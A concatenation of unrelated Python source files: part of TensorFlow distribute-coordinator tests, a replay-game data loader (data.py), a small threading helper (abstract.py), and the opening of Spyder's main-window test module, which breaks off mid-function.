    if task_type not in self._worker_context:
      self._worker_context[task_type] = []
    # Pad the per-type list with None so it can be indexed by task_id.
    while len(self._worker_context[task_type]) <= task_id:
      self._worker_context[task_type].append(None)
    self._worker_context[task_type][task_id] = (context.master_target,
                                                context.num_workers,
                                                context.is_chief,
                                                context.distributed_mode)
def _dump_strategy_property(self, strategy):
  """Records (should_init, should_checkpoint, should_save_summary) per task.

  Also asserts the worker context exposes the same property values as the
  strategy it was configured from.
  """
  context = distribute_coordinator_context.get_current_worker_context()
  self.assertTrue(context is not None)

  self.assertEqual(context._strategy.should_init, strategy.should_init)
  self.assertEqual(context.should_checkpoint, strategy.should_checkpoint)
  self.assertEqual(context.should_save_summary, strategy.should_save_summary)

  task_type = str(context.task_type)
  task_id = context.task_id or 0
  with self._lock:
    if task_type not in self._strategy_property:
      self._strategy_property[task_type] = []
    # Pad the per-type list with None so it can be indexed by task_id.
    while len(self._strategy_property[task_type]) <= task_id:
      self._strategy_property[task_type].append(None)
    self._strategy_property[task_type][task_id] = (
        context._strategy.should_init, context.should_checkpoint,
        context.should_save_summary)
def _run_mock_std_server(self,
                         session_config=None,
                         cluster_spec=None,
                         task_type=None,
                         task_id=None,
                         rpc_layer=None,
                         environment=None):
  """Records a MockServer per (task_type, task_id) instead of a real server."""
  key = str(task_type)
  index = task_id or 0
  server = MockServer()
  with self._lock:
    servers = self._std_servers.setdefault(key, [])
    # Pad with None so the list can be indexed by task_id.
    while len(servers) <= index:
      servers.append(None)
    servers[index] = server
  return server
class DistributeCoordinatorTestStandaloneMode(DistributeCoordinatorTestBase):
  """Tests `run_distribute_coordinator` in standalone client mode."""

  def testInGraphStandaloneMode(self):
    """Test it runs in-graph replication in standalone client mode."""
    distribute_coordinator.run_distribute_coordinator(
        self._in_graph_worker_fn,
        MockStrategy(between_graph=False),
        cluster_spec=self._cluster_spec)
    self.assertEqual(self._result_correct, 1)

  def testBetweenGraph(self):
    """Test it runs between-graph replication in standalone client mode."""
    distribute_coordinator.run_distribute_coordinator(
        self._between_graph_worker_fn,
        MockStrategy(between_graph=True),
        cluster_spec=self._cluster_spec)

    # Each finished worker will increment self._result_correct.
    self.assertEqual(self._result_correct, NUM_WORKERS)

  def testBetweenGraphWithMonitoredSession(self):
    """Test monitored session in standalone client mode."""
    distribute_coordinator.run_distribute_coordinator(
        self._between_graph_with_monitored_session,
        MockStrategy(between_graph=True),
        cluster_spec=self._cluster_spec)

    # Each finished worker will increment self._result_correct.
    self.assertEqual(self._result_correct, NUM_WORKERS)

  def testBetweenGraphContext(self):
    # Dumps the task contexts to the self._worker_context dict.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_worker_context,
        MockStrategy(between_graph=True),
        cluster_spec=self._cluster_spec)

    # There is only one type of task and there three such tasks.
    self.assertEqual(len(self._worker_context), 1)
    self.assertTrue(WORKER in self._worker_context)
    self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)

    # Check whether each task has the right master_target, num_workers,
    # is_chief and distributed_mode.
    self.assertEqual(
        self._worker_context[WORKER][0],
        (_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))
    self.assertEqual(
        self._worker_context[WORKER][1],
        (_bytes_to_str(self._workers[1].target), NUM_WORKERS, False, True))
    self.assertEqual(
        self._worker_context[WORKER][2],
        (_bytes_to_str(self._workers[2].target), NUM_WORKERS, False, True))

  def testBetweenGraphStrategyProperties(self):
    # Dumps properties of the strategy objects.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_strategy_property,
        MockStrategy(between_graph=True, should_init=True),
        cluster_spec=self._cluster_spec)

    # There is only one type of task and there three such tasks.
    self.assertEqual(len(self._strategy_property), 1)
    self.assertTrue(WORKER in self._strategy_property)
    self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)

    # Check whether each task has the right properties of should_init,
    # should_checkpoint and should_save_summary.
    self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
    self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
    self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))

  def testInGraphContext(self):
    # Dumps the task contexts to the self._worker_context dict.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_worker_context,
        MockStrategy(between_graph=False),
        cluster_spec=self._cluster_spec)

    # There is only a "None" task in the dumped task context.
    self.assertEqual(len(self._worker_context), 1)
    self.assertTrue("None" in self._worker_context)
    self.assertEqual(len(self._worker_context["None"]), 1)

    # Check whether each task has the right master_target, num_workers,
    # is_chief and distributed_mode.
    self.assertEqual(
        self._worker_context["None"][0],
        (_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))

  def testLocalContext(self):
    # Dumps the task contexts to the self._worker_context dict.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_worker_context,
        MockStrategy(between_graph=False),
        cluster_spec=None)

    # There is only a "None" task.
    self.assertEqual(len(self._worker_context), 1)
    self.assertTrue("None" in self._worker_context)
    self.assertEqual(len(self._worker_context["None"]), 1)

    # Check whether each task has the right master_target, num_workers,
    # is_chief and distributed_mode.
    self.assertEqual(self._worker_context["None"][0], ("", 0, True, False))

  def testBetweenGraphContextWithChief(self):
    # Adds a chief node, so there are NUM_WORKERS + 1 workers in total.
    cluster_spec = copy.deepcopy(self._cluster_spec)
    cluster_spec[CHIEF] = ["fake_chief"]

    # Dumps the task contexts to the self._worker_context dict.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_worker_context,
        MockStrategy(between_graph=True),
        cluster_spec=cluster_spec,
        rpc_layer="grpc")

    # There are one CHIEF and three workers.
    self.assertEqual(len(self._worker_context), 2)
    self.assertTrue(CHIEF in self._worker_context)
    self.assertTrue(WORKER in self._worker_context)
    self.assertEqual(len(self._worker_context[CHIEF]), 1)
    self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)

    # Check whether each task has the right master_target, num_workers,
    # is_chief and distributed_mode.
    self.assertEqual(self._worker_context[CHIEF][0],
                     ("grpc://fake_chief", 4, True, True))
    self.assertEqual(
        self._worker_context[WORKER][0],
        (_bytes_to_str(self._workers[0].target), NUM_WORKERS + 1, False, True))
    self.assertEqual(
        self._worker_context[WORKER][1],
        (_bytes_to_str(self._workers[1].target), NUM_WORKERS + 1, False, True))
    self.assertEqual(
        self._worker_context[WORKER][2],
        (_bytes_to_str(self._workers[2].target), NUM_WORKERS + 1, False, True))

  def testInGraphContextWithEval(self):
    # Adds a EVALUATOR job.
    cluster_spec = copy.deepcopy(self._cluster_spec)
    cluster_spec[EVALUATOR] = ["fake_evaluator"]

    # Dumps the task contexts to the self._worker_context dict.
    distribute_coordinator.run_distribute_coordinator(
        self._dump_worker_context,
        MockStrategy(between_graph=False),
        cluster_spec=cluster_spec,
        rpc_layer=None)

    # There are one "None" task and one EVALUATOR task.
    self.assertEqual(len(self._worker_context), 2)
    self.assertTrue("None" in self._worker_context)
    self.assertTrue(EVALUATOR in self._worker_context)
    self.assertEqual(len(self._worker_context["None"]), 1)
    self.assertEqual(len(self._worker_context[EVALUATOR]), 1)

    # Check whether each task has the right master_target, num_workers,
    # is_chief and distributed_mode.
    self.assertEqual(self._worker_context["None"][0], (_strip_protocol(
        _bytes_to_str(self._workers[0].target)), 3, True, True))
    self.assertEqual(self._worker_context[EVALUATOR][0],
                     ("fake_evaluator", 3, True, False))
class DistributeCoordinatorTestInpendentWorkerMode(
    DistributeCoordinatorTestBase):
  """Tests `run_distribute_coordinator` in independent-worker mode.

  Each task runs its own coordinator in a separate thread instead of a
  single standalone client driving the whole cluster.
  """

  def testInGraph(self):
    cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
    threads = self._run_multiple_coordinator_in_threads(
        self._in_graph_worker_fn,
        MockStrategy(between_graph=False),
        cluster_spec,
        mode=INDEPENDENT_WORKER)
    threads[WORKER][0].join()
    self.assertEqual(self._result_correct, 1)

  def testBetweenGraph(self):
    cluster_spec = self._create_cluster_spec(
        num_workers=NUM_WORKERS, num_ps=NUM_PS)
    threads = self._run_multiple_coordinator_in_threads(
        self._between_graph_worker_fn,
        MockStrategy(between_graph=True),
        cluster_spec,
        mode=INDEPENDENT_WORKER)
    for task_id in range(NUM_WORKERS):
      threads[WORKER][task_id].join()

    # Each finished worker will increment self._result_correct.
    self.assertEqual(self._result_correct, NUM_WORKERS)

  def testBetweenGraphWithMonitoredSession(self):
    cluster_spec = self._create_cluster_spec(
        num_workers=NUM_WORKERS, num_ps=NUM_PS)
    threads = self._run_multiple_coordinator_in_threads(
        self._between_graph_with_monitored_session,
        MockStrategy(between_graph=True),
        cluster_spec,
        mode=INDEPENDENT_WORKER)
    for task_id in range(NUM_WORKERS):
      threads[WORKER][task_id].join()

    # Each finished worker will increment self._result_correct.
    self.assertEqual(self._result_correct, NUM_WORKERS)

  def testBetweenGraphContext(self):
    cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
    # Dumps the task contexts and std server arguments.
    with test.mock.patch.object(distribute_coordinator, "_run_std_server",
                                self._run_mock_std_server):
      threads = self._run_multiple_coordinator_in_threads(
          self._dump_worker_context,
          MockStrategy(between_graph=True),
          cluster_spec,
          mode=INDEPENDENT_WORKER,
          rpc_layer=None)
      for task_id in range(NUM_WORKERS):
        threads[WORKER][task_id].join()

    # There is only one type of task and three such tasks.
    self.assertEqual(len(self._worker_context), 1)
    self.assertTrue(WORKER in self._worker_context)
    self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)

    # Check whether each task has the right master_target, num_workers,
    # is_chief and distributed_mode.
    self.assertEqual(
        self._worker_context[WORKER][0],
        (_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
    self.assertEqual(
        self._worker_context[WORKER][1],
        (_bytes_to_str(cluster_spec[WORKER][1]), NUM_WORKERS, False, True))
    self.assertEqual(
        self._worker_context[WORKER][2],
        (_bytes_to_str(cluster_spec[WORKER][2]), NUM_WORKERS, False, True))

    # Make sure each worker runs a std server.
    self.assertEqual(len(self._std_servers), 1)
    self.assertTrue(WORKER in self._std_servers)
    self.assertEqual(len(self._std_servers[WORKER]), 3)
    self.assertFalse(self._std_servers[WORKER][0].joined)
    self.assertFalse(self._std_servers[WORKER][1].joined)
    self.assertFalse(self._std_servers[WORKER][2].joined)

  def testBetweenGraphStrategyProperties(self):
    cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
    # Dumps properties of the strategy objects.
    with test.mock.patch.object(distribute_coordinator, "_run_std_server",
                                self._run_mock_std_server):
      threads = self._run_multiple_coordinator_in_threads(
          self._dump_strategy_property,
          MockStrategy(between_graph=True, should_init=True),
          cluster_spec,
          mode=INDEPENDENT_WORKER,
          rpc_layer=None)
      for task_id in range(NUM_WORKERS):
        threads[WORKER][task_id].join()

    # There is only one type of task and there three such tasks.
    self.assertEqual(len(self._strategy_property), 1)
    self.assertTrue(WORKER in self._strategy_property)
    self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)

    # Check whether each task has the right properties of should_init,
    # should_checkpoint and should_save_summary.
    self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
    self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
    self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))

  def testInGraphContext(self):
    cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
    # Dumps the task contexts and std server arguments.
    with test.mock.patch.object(distribute_coordinator, "_run_std_server",
                                self._run_mock_std_server):
      threads = self._run_multiple_coordinator_in_threads(
          self._dump_worker_context,
          MockStrategy(between_graph=False),
          cluster_spec,
          mode=INDEPENDENT_WORKER,
          rpc_layer=None)
      for task_id in range(NUM_WORKERS):
        threads[WORKER][task_id].join()

    # There is only a "None" task in the dumped task context.
    self.assertEqual(len(self._worker_context), 1)
    self.assertTrue("None" in self._worker_context)
    self.assertEqual(len(self._worker_context["None"]), 1)

    # Check whether each task has the right master_target, num_workers,
    # is_chief and distributed_mode.
    self.assertEqual(
        self._worker_context["None"][0],
        (_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))

    # Make sure each worker runs a std server. Only worker 0 acts as client;
    # the other workers' servers are joined.
    self.assertEqual(len(self._std_servers), 1)
    self.assertTrue(WORKER in self._std_servers)
    self.assertEqual(len(self._std_servers[WORKER]), 3)
    self.assertFalse(self._std_servers[WORKER][0].joined)
    self.assertTrue(self._std_servers[WORKER][1].joined)
    self.assertTrue(self._std_servers[WORKER][2].joined)

  def testInGraphContextWithEval(self):
    # Adds a EVALUATOR job.
    cluster_spec = self._create_cluster_spec(
        num_workers=NUM_WORKERS, has_eval=True)

    # Dumps the task contexts and std server arguments.
    with test.mock.patch.object(distribute_coordinator, "_run_std_server",
                                self._run_mock_std_server):
      threads = self._run_multiple_coordinator_in_threads(
          self._dump_worker_context,
          MockStrategy(between_graph=False),
          cluster_spec,
          mode=INDEPENDENT_WORKER,
          rpc_layer=None)
      for task_id in range(NUM_WORKERS):
        threads[WORKER][task_id].join()
      threads[EVALUATOR][0].join()

    # There are one "None" task and one EVALUATOR task.
    self.assertEqual(len(self._worker_context), 2)
    self.assertTrue("None" in self._worker_context)
    self.assertTrue(EVALUATOR in self._worker_context)
    self.assertEqual(len(self._worker_context["None"]), 1)
    self.assertEqual(len(self._worker_context[EVALUATOR]), 1)

    # Check whether each task has the right master_target, num_workers,
    # is_chief and distributed_mode.
    self.assertEqual(self._worker_context["None"][0],
                     (_bytes_to_str(cluster_spec[WORKER][0]), 3, True, True))
    self.assertEqual(self._worker_context[EVALUATOR][0],
                     (cluster_spec[EVALUATOR][0], 3, True, False))

    # Make sure each worker runs a std server.
    self.assertEqual(len(self._std_servers), 2)
    self.assertTrue(WORKER in self._std_servers)
    self.assertTrue(EVALUATOR in self._std_servers)
    self.assertEqual(len(self._std_servers[WORKER]), 3)
    self.assertEqual(len(self._std_servers[EVALUATOR]), 1)
    self.assertFalse(self._std_servers[WORKER][0].joined)
    self.assertTrue(self._std_servers[WORKER][1].joined)
    self.assertTrue(self._std_servers[WORKER][2].joined)
    self.assertFalse(self._std_servers[EVALUATOR][0].joined)

  def testRunStdServerInGoogleEnvironment(self):
    cluster_spec = {"worker": ["fake_worker"], "ps": ["localhost:0"]}
    tf_config = {"cluster": cluster_spec, "environment": "google"}

    joined = [False]

    def _fake_sleep(_):
      # The ps task loops on time.sleep; reaching it means the server "joined".
      joined[0] = True
      original_sys_exit(0)

    def _thread_fn(cluster_spec):
      distribute_coordinator.run_distribute_coordinator(
          None,
          MockStrategy(between_graph=True),
          mode=INDEPENDENT_WORKER,
          cluster_spec=cluster_spec,
          task_type="ps",
          task_id=0)

    with test.mock.patch.dict(
        "os.environ",
        {"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
            time, "sleep", _fake_sleep):
      t = threading.Thread(target=_thread_fn, args=(cluster_spec,))
      t.start()
      t.join()
    self.assertTrue(joined[0])

  def testRpcLayerEnvironmentVariable(self):
    cluster_spec = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
    tf_config = {"cluster": cluster_spec, "rpc_layer": "cake"}

    rpc_layer_from_coordinator = [None]

    def _run_mock_server(cluster_spec=None,
                         task_type=None,
                         task_id=None,
                         session_config=None,
                         rpc_layer=None,
                         environment=None):
      del cluster_spec, task_type, task_id, session_config, environment
      # Capture the rpc_layer the coordinator passes to the std server.
      rpc_layer_from_coordinator[0] = rpc_layer
      return MockServer()

    with test.mock.patch.dict(
        "os.environ",
        {"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
            distribute_coordinator, "_run_std_server", _run_mock_server):
      distribute_coordinator.run_distribute_coordinator(
          None,
          MockStrategy(between_graph=True),
          mode=INDEPENDENT_WORKER,
          cluster_spec=cluster_spec,
          task_type="ps",
          task_id=0)
      self.assertEqual(rpc_layer_from_coordinator[0], "cake")
class StrategyConfigureTest(test.TestCase):
  """Tests that strategy configuration reaches session configs and servers."""

  def setUp(self):
    # Filled in by the dump helpers below.
    self._device_filters = []
    self._intra_op_parallelism_threads = None
    self._inter_op_parallelism_threads = None
    super(StrategyConfigureTest, self).setUp()

  def _dump_device_filters(self, *args, **kwargs):
    """Stand-in for `_run_std_server` that records its session_config."""
    session_config = kwargs.get("session_config", None)
    self._device_filters.extend(session_config.device_filters)
    self._intra_op_parallelism_threads = (
        session_config.intra_op_parallelism_threads)
    self._inter_op_parallelism_threads = (
        session_config.inter_op_parallelism_threads)
    return MockServer()

  def _worker_fn(self, strategy):
    """Worker fn that records the session_config from the worker context."""
    worker_context = distribute_coordinator_context.get_current_worker_context()
    session_config = worker_context._session_config
    self._device_filters.extend(session_config.device_filters)
    self._intra_op_parallelism_threads = (
        session_config.intra_op_parallelism_threads)
    self._inter_op_parallelism_threads = (
        session_config.inter_op_parallelism_threads)
    return MockServer()

  def test_session_config_in_std_server(self):
    cluster_spec = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
    tf_config = {"cluster": cluster_spec}

    with test.mock.patch.dict(
        "os.environ",
        {"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
            distribute_coordinator, "_run_std_server",
            self._dump_device_filters):
      distribute_coordinator.run_distribute_coordinator(
          lambda _: None,
          MockStrategy(between_graph=True),
          mode=INDEPENDENT_WORKER,
          cluster_spec=cluster_spec,
          task_type="worker",
          task_id=0)
    self.assertEqual(self._intra_op_parallelism_threads, 1)
    self.assertEqual(self._inter_op_parallelism_threads, 0)

  def test_session_config_in_session_creator(self):
    cluster_spec = {"worker": ["localhost:0"]}
    tf_config = {"cluster": cluster_spec}

    with test.mock.patch.dict("os.environ",
                              {"TF_CONFIG": json.dumps(tf_config)}):
      distribute_coordinator.run_distribute_coordinator(
          self._worker_fn,
          MockStrategy(between_graph=True),
          mode=INDEPENDENT_WORKER,
          cluster_spec=cluster_spec,
          task_type="worker",
          task_id=0)
    self.assertEqual(self._device_filters, ["/job:worker/task:0", "/job:ps"])
    self.assertEqual(self._intra_op_parallelism_threads, 2)
    self.assertEqual(self._inter_op_parallelism_threads, 0)

  def test_eval_strategy_configure(self):
    cluster_spec = {"evaluator": ["localhost:0"]}
    tf_config = {"cluster": cluster_spec}

    with test.mock.patch.dict("os.environ",
                              {"TF_CONFIG": json.dumps(tf_config)}):
      distribute_coordinator.run_distribute_coordinator(
          lambda _: None,
          MockStrategy(between_graph=False),
          eval_fn=self._worker_fn,
          eval_strategy=MockStrategy(between_graph=True),
          mode=INDEPENDENT_WORKER,
          cluster_spec=cluster_spec,
          task_type="evaluator",
          task_id=0)
    self.assertEqual(self._device_filters, ["/job:somejob"])
    self.assertEqual(self._intra_op_parallelism_threads, 0)
    self.assertEqual(self._inter_op_parallelism_threads, 2)
if __name__ == "__main__":
  # TODO(yuefengz): find a smart way to terminate std server threads.
  # Patch sys.exit with os._exit so lingering server threads can't keep the
  # process alive.
  with test.mock.patch.object(sys, "exit", os._exit):
    test.main()
|
data.py | import atexit
import itertools
import multiprocessing as mp
import os
import pickle
import random
import zlib
import numpy as np
import tree
import stats
import utils
def train_test_split(data_dir, subset=None, test_ratio=.1, seed=0):
  """Deterministically splits replay files into train and test sets.

  Args:
    data_dir: Directory containing the pickled game files.
    subset: Optional subset name looked up in `stats.SUBSETS`; when given,
      those filenames are used instead of listing `data_dir`.
    test_ratio: Fraction of files held out for the test set.
    seed: Seed for the split RNG; the same seed always yields the same split.

  Returns:
    A `(train_paths, test_paths)` tuple of full file paths.
  """
  if subset:
    filenames = stats.SUBSETS[subset]()
    filenames = [name + '.pkl' for name in filenames]
  else:
    filenames = sorted(os.listdir(data_dir))

  # Bug fix: the split was documented as reproducible but used an unseeded
  # random.Random(), so it changed on every run. Seed it explicitly.
  rng = random.Random(seed)
  test_files = rng.sample(filenames, int(test_ratio * len(filenames)))
  test_set = set(test_files)
  train_files = [f for f in filenames if f not in test_set]

  train_paths = [os.path.join(data_dir, f) for f in train_files]
  test_paths = [os.path.join(data_dir, f) for f in test_files]
  return train_paths, test_paths
def game_len(game):
  """Length of a game, measured by its second component."""
  frames = game[1]
  return len(frames)
class TrajectoryManager:
  """Slices a stream of games into consecutive fixed-length chunks.

  Pulls games from `source` (an iterator of games) and hands out
  `n`-frame chunks, fetching a new, long-enough game whenever the
  current one is exhausted.
  """
  # TODO: manage recurrent state? can also do it in the learner

  def __init__(self, source):
    self.source = source
    self.game = None  # current game being sliced; None until first grab

  def find_game(self, n):
    """Advances `source` until a game with at least `n` frames is found."""
    while True:
      game = next(self.source)
      if game_len(game) >= n:
        break
    self.game = game
    self.frame = 0  # index of the next unread frame

  def grab_chunk(self, n):
    """Returns (`n`-frame chunk, needs_reset).

    `needs_reset` is True when the chunk starts a fresh game rather than
    continuing the previous chunk.
    """
    # TODO: write a unit test for this
    needs_reset = self.game is None or game_len(self.game) - self.frame < n
    if needs_reset:
      self.find_game(n)

    new_frame = self.frame + n
    # Renamed from `slice`, which shadowed the builtin of the same name.
    take_slice = lambda a: a[self.frame:new_frame]
    chunk = tree.map_structure(take_slice, self.game)

    self.frame = new_frame
    return chunk, needs_reset
def swap_players(game):
  """Returns a shallow copy of `game` with the two players' data exchanged."""
  players = game['player']
  swapped = game.copy()
  swapped['player'] = {1: players[2], 2: players[1]}
  return swapped
def detect_repeated_actions(controllers):
  """Labels actions as repeated or not.

  Args:
    controllers: A nest of numpy arrays with shape [T].

  Returns:
    A boolean numpy array `repeats` with shape [T-1], where repeats[i] is
    True iff controllers[i+1] equals controllers[i] in every leaf array.
  """
  equals_next = lambda a: a[:-1] == a[1:]
  per_leaf = tree.map_structure(equals_next, controllers)
  stacked = np.stack(tree.flatten(per_leaf), -1)
  return np.all(stacked, -1)
def indices_and_counts(repeats, max_repeat=15):
  """Finds the indices and counts of repeated actions.

  `repeats` is meant to be produced by `detect_repeated_actions`.
  If `controllers` is [a, a, a, c, b, b], then
    repeats = [T, T, F, F, T]
    indices = [2, 3, 5]
    counts  = [2, 0, 1]

  Args:
    repeats: A boolean array with shape [T-1].
    max_repeat: Maximum number of consecutive repeated actions before a repeat
      is considered a non-repeat.

  Returns:
    A tuple (indices, counts) of numpy arrays.
  """
  indices = []
  counts = []
  run_length = 0
  for i, is_repeat in enumerate(repeats):
    if is_repeat and run_length != max_repeat:
      run_length += 1
    else:
      # Close the current run at the last repeated action.
      indices.append(i)
      counts.append(run_length)
      run_length = 0
  # The final action always terminates a run.
  indices.append(len(repeats))
  counts.append(run_length)
  return np.array(indices), np.array(counts)
def compress_repeated_actions(game, embed_controller, max_repeat):
  """Run-length compresses `game` along time by dropping repeated actions.

  Returns:
    A (compressed_game, counts) tuple: `compressed_game` keeps only the
    frames at the repeat-run boundaries, and `counts` gives the number of
    dropped repeats preceding each kept frame.
  """
  # Preprocess (discretize) player 1's controller states before repeat
  # detection, so preprocessing-equal actions count as repeats.
  controllers = game['player'][1]['controller_state']
  controllers = embed_controller.map(lambda e, a: e.preprocess(a), controllers)
  repeats = detect_repeated_actions(controllers)
  indices, counts = indices_and_counts(repeats, max_repeat)
  compressed_game = tree.map_structure(lambda a: a[indices], game)
  return compressed_game, counts
class DataSource:
  """Iterator producing batched, fixed-length chunks of recorded games."""

  def __init__(
      self,
      filenames,
      compressed=True,  # whether files on disk are zlib-compressed pickles
      batch_size=64,
      unroll_length=64,
      max_action_repeat=15,
      # preprocesses (discretizes) actions before repeat detection
      embed_controller=None,
  ):
    self.filenames = filenames
    self.batch_size = batch_size
    self.unroll_length = unroll_length
    self.compressed = compressed
    self.max_action_repeat = max_action_repeat
    self.embed_controller = embed_controller
    trajectories = self.produce_trajectories()
    # All managers pull from the same generator, so each produced game goes
    # to exactly one batch slot.
    self.managers = [
        TrajectoryManager(trajectories)
        for _ in range(batch_size)]

  def produce_trajectories(self):
    """Yields processed (repeat-compressed) games, cycling forever."""
    raw_games = self.produce_raw_games()
    yield from map(self.process_game, raw_games)

  def process_game(self, game):
    # Returns (compressed_game, counts) — see compress_repeated_actions.
    return compress_repeated_actions(
        game, self.embed_controller, self.max_action_repeat)

  def produce_raw_games(self):
    """Raw games without post-processing."""
    for path in itertools.cycle(self.filenames):
      with open(path, 'rb') as f:
        obj_bytes = f.read()
      if self.compressed:
        obj_bytes = zlib.decompress(obj_bytes)
      game = pickle.loads(obj_bytes)
      yield game
      # Also yield the game with ports swapped, doubling the data.
      yield swap_players(game)

  def __next__(self):
    # One chunk per manager, batched along a leading batch dimension.
    return utils.batch_nest(
        [m.grab_chunk(self.unroll_length) for m in self.managers])
def produce_batches(data_source_kwargs, batch_queue):
  """Builds a DataSource and pushes its batches onto `batch_queue` forever."""
  source = DataSource(**data_source_kwargs)
  while True:
    batch_queue.put(next(source))
class DataSourceMP:
  """Runs a DataSource in a subprocess that prefetches batches into a queue."""

  def __init__(self, buffer=4, **kwargs):
    # Mirror the DataSource kwargs as attributes so callers can inspect them.
    for k, v in kwargs.items():
      setattr(self, k, v)
    # Bounded queue: the producer blocks once `buffer` batches are waiting.
    self.batch_queue = mp.Queue(buffer)
    self.process = mp.Process(
        target=produce_batches, args=(kwargs, self.batch_queue))
    self.process.start()

    # atexit runs callbacks LIFO, so the producer process is terminated
    # before the queue is closed.
    atexit.register(self.batch_queue.close)
    atexit.register(self.process.terminate)

  def __next__(self):
    # Blocks until the producer process has a batch ready.
    return self.batch_queue.get()
|
abstract.py | """
Multi-threading with GIL in python is useful for blocking I/O
# Threads to make multiple system calls in parallel
System calls issued from multiple Python threads all run in parallel,
even though the threads themselves are limited by the GIL. The GIL prevents
Python code from running in parallel, but it has no negative effect on system calls.
This works because Python threads release the GIL just before they make system
calls and reacquire the GIL as soon as the system calls are done.
"""
import threading
from util.commons_util.decorators.classes import *
__author__ = 'Danyang'
def print_msg(name, msg):
    """Prints "<name> says: <msg>" to stdout.

    Uses the parenthesized single-argument print form, which is valid in
    both Python 2 (print statement with a parenthesized expression) and
    Python 3, so the module stays importable under either interpreter.
    """
    print("%s says: %s" % (name, msg))
class AbstractThread(threading.Thread):
    """Named thread base class with a production flag.

    e.g.
      thread = AbstractThread(name="worker")
      thread.start()
      thread.join()
    """
    @Override(threading.Thread)
    def __init__(self, name, production=False):
        super(AbstractThread, self).__init__()
        self.name = name  # thread name, also used as the message prefix
        self.production = production  # flag for production vs. test usage

    def print_msg(self, msg):
        # Delegates to the module-level print_msg helper, prefixing this
        # thread's name.
        print_msg(self.name, msg)
test_mainwindow.py | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""
# Standard library imports
import os
import os.path as osp
import psutil
import re
import shutil
import sys
import tempfile
from textwrap import dedent
import threading
import traceback
from unittest.mock import Mock
import uuid
# Third party imports
from flaky import flaky
import ipykernel
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pkg_resources
from pkg_resources import parse_version
import pylint
import pytest
from qtpy import PYQT_VERSION
from qtpy.QtCore import Qt, QTimer
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage, QTextCursor
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QInputDialog,
QLineEdit, QTabBar, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE
# Local imports
from spyder import __trouble_url__
from spyder.api.utils import get_class_values
from spyder.api.widgets.auxiliary_widgets import SpyderWindowWidget
from spyder.api.plugins import Plugins
from spyder.app import start
from spyder.config.base import (
get_home_dir, get_conf_path, get_module_path, running_in_ci)
from spyder.config.manager import CONF
from spyder.dependencies import DEPENDENCIES
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.plugins.layout.layouts import DefaultLayouts
from spyder.plugins.projects.api import EmptyProject
from spyder.py3compat import PY2, qbytearray_to_str, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import remove_backslashes
from spyder.utils.clipboard_helper import CLIPBOARD_HELPER
from spyder.widgets.dock import DockTitleBar
# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
# Time to wait until the IPython console is ready to receive input
# (in milliseconds)
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000
# Need longer EVAL_TIMEOUT, because need to cythonize and C compile ".pyx" file
# before import and eval it
COMPILE_AND_EVAL_TIMEOUT = 30000
# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000
# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
    """Open a file using the Editor and its open file dialog"""
    for widget in QApplication.topLevelWidgets():
        if not isinstance(widget, QFileDialog):
            continue
        if directory is not None:
            widget.setDirectory(directory)
        file_name_edit = widget.findChildren(QLineEdit)[0]
        file_name_edit.setText(fname)
        QTest.keyClick(widget, Qt.Key_Enter)
def reset_run_code(qtbot, shell, code_editor, nsb):
    """Reset state after a run code test"""
    # Wait for any in-flight execution to finish before resetting.
    qtbot.waitUntil(lambda: not shell._executing)
    with qtbot.waitSignal(shell.executed):
        shell.execute('%reset -f')
    # Wait until the Variable Explorer reflects the emptied namespace.
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
                    timeout=EVAL_TIMEOUT)
    # Put the cursor back at the start of the editor.
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
                     **kwargs):
    """Start a new kernel, and return its Manager and Client"""
    manager = KernelManager(kernel_name=kernel_name)
    if spykernel:
